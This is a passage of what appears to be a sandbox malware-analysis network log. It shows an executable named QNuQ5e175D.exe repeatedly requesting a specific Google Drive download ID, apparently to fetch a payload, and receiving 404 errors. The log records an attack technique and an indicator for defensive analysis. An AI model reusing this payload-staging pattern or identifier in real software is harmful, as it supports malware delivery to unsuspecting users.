                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:56 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="BQiD7-DqdMkmQ0oswM_7iA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      50 | 192.168.2.11 | 50030 | 172.217.16.142 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:57 UTC | 424 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:57 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:57 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-SBrG1hvBk24RBpy5pq4hTw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      51 | 192.168.2.11 | 50031 | 142.250.184.225 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:58 UTC | 466 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:06:59 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgRdPOs9xyfsFG63nV1mt25njVJ_XT59WnRXpm6j5BWmyRcg7j-WzlRF_bcpyOQ-0ToSCzofaDs
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:06:58 GMT
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-fvE0Sq6ueHzbcP01s4468g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:06:59 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="H0nQoQ5Qf44ndxcjnkC9hQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      52 | 192.168.2.11 | 50032 | 172.217.16.142 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:06:59 UTC | 424 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:00 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:00 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-DEMSaf9hGjN3wvCSHqd9XA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      53 | 192.168.2.11 | 50033 | 142.250.184.225 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:07:00 UTC | 466 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:01 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFiumC41sDb8myeUXrsEiau_XSe-HqAGpRpVND6K19KJgQyGsrl7sLHVDgrsXjFeCFpzdRs4
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:01 GMT
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-uXGAboKZ8zEMWZ9PLcFzyQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:07:01 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wmM0M3xX_15I1MG4cHmmgg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      54 | 192.168.2.11 | 50034 | 172.217.16.142 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:07:02 UTC | 424 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:02 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:02 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-NIlbUPw2lLpebQ4MUKWzzg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      55 | 192.168.2.11 | 50035 | 142.250.184.225 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:07:03 UTC | 466 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:03 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgToru8h0awP8tiM2VZerbLzFWseOk7Xp5bMiH61jGOOuExvYFa1fswxOUyYIZtSt3X1xr7Rzz4
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:03 GMT
                                                      Content-Security-Policy: script-src 'nonce-SGZ1vJU3G8e20QrjM0lTJg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:07:03 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UpubOEw03yuwRpdLlx1_Kw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      56 | 192.168.2.11 | 50036 | 172.217.16.142 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:07:04 UTC | 424 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:04 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:04 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-mss5tc9l6Scz7YgPy5zOEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      57 | 192.168.2.11 | 50037 | 142.250.184.225 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:07:05 UTC | 466 | OUT | GET /download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:05 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgQ2nk-A7of0RxG9ZcrYhDVmQPlq5XwPjucQIcNmHQk9c6ZXVr-1z2N7BJdrgnrZFgLqiQe-0ww
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:05 GMT
                                                      Content-Security-Policy: script-src 'nonce-l-8onPjgFeRex80tzj8cYQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 04:07:05 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="w_v06WImuAbjpGk3imPJdA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      58 | 192.168.2.11 | 50038 | 172.217.16.142 | 443 | 7988 | C:\Users\user\Desktop\QNuQ5e175D.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2025-01-11 04:07:06 UTC | 424 | OUT | GET /uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=M_ZM-qe0hZo3co2jd_WzZQpOKAaaZ0wi4mOh41YgqjGKGA8htFwOP-1NuMf6H-D4Na57_6kYnXw5n5OzZ8eDZ817p3o0OIITe39NmNWcEZDsNL2ijJLZYCvkerixY4B_quLIpw6a72D0g0KMjdV3713OOoI1Lx9joBxAqNjPcgyfLWinVWR0ZxAslRVhGQ
                                                      2025-01-11 04:07:07 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 04:07:06 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
